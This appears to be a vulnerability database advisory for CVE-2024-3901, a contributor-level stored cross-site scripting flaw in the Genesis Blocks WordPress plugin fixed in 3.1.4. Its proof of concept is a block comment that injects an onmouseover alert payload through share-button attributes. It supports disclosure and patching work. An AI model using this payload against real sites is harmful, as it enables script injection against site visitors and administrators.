Genesis Blocks < 3.1.4 – Contributor+ Stored XSS | CVE 2024-3901 | Plugin Vulnerabilities

Description

The plugin does not properly escape attributes provided to some of its custom blocks, making it possible for users allowed to write posts (like those with the contributor role) to conduct Stored XSS attacks.

Proof of Concept

Create a new Post and put the below payload while in Code Editor mode:

<!-- wp:genesis-blocks/gb-sharing {"clientId":"637f246b-cc4c-4af5-8fbd-bcbe40306498","email":true,"shareButtonShape":"123\u0022onmouseover='alert(1)'"} /-->

The following block attributes are also vulnerable using the same payload:

- shareButtonStyle
- shareButtonSize
- shareButtonColor
- shareAlignment

Affects Plugins

Fixed in 3.1.4

References

CVE

URL

https://research.cleantalk.org/cve-2024-3901/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://research.cleantalk.org

Verified

Yes

WPVDB ID

9502e1ac-346e-4431-90a6-61143d2df37b

Timeline

Publicly Published

2024-04-12 (about 1 year ago)

Added

2024-07-09 (about 1 year ago)

Last Updated

2024-09-27 (about 1 year ago)

Other

Published

Title

Published

2023-03-16

Title

WP Tiles <= 1.1.2 - Contributor+ Stored XSS

Published

2025-04-28

Title

Boot Store <= 1.6.4 - Reflected Cross-Site Scripting

Published

2025-11-17

Title

Gutenify - Visual Site Builder Blocks & Site Templates <= 1.5.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Count Up block

Published

2014-08-01

Title

Wysija Newsletters - swfupload Cross-Site Scripting

Published

2024-11-20

Title

Slick Sitemap <= 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting